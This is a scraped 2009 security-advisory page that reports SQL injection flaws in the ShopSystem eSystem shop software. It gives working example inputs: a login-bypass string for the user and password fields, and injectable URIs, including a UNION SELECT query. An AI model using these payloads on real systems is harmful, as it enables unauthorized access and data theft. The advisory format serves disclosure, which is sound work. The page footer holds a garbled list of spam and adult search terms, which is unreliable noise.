about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ShopSystem eSystem Multiple SQL Injection Vulnerabilities


Title ShopSystem eSystem Multiple SQL Injection Vulnerabilities
Published 2009-01-26-12:00AM
Updated 2009-01-28-08:19PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cyb3r-1sT
Vulnerable  ShopSystem eSystem 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example input and URIs are available:http://www.example.com/logon.asp
user : Gaza ' or ' Gaza=Victory--
pass : Gaza ' or ' Gaza=Victory--http://www.example.com/Pop.asp?pro_id=[sql]
http://www.example.com/addtobasket.asp?pro_id=[sql]
http://www.example.com/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:03:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Casino roy 2...n.com/ www.rdczj. www.tamila 2...n.com/ 2...n.com/ +fake+nude Lihat film pcanywhere jforum Www.arabse government A...13,268 2...n.com/ 200 /compo php%20gues www.pcw8.c shop340001 lo47l 2...n.com/ e815 %253D+%252 %253D+%252 t66t wamp_dir/s Sexy vadio components hachked sk news for c poto sexy news for c 2...n.com/ www.sexnit bedava+por sexsex6 89com. 89sex com. 2...n.com/ www.ezdriv Ebony indian sex news for c hidden vid xxxwwe.com 2...n.com/ components sexy vedi8 http://blo 2...n.com/ rpotry@hub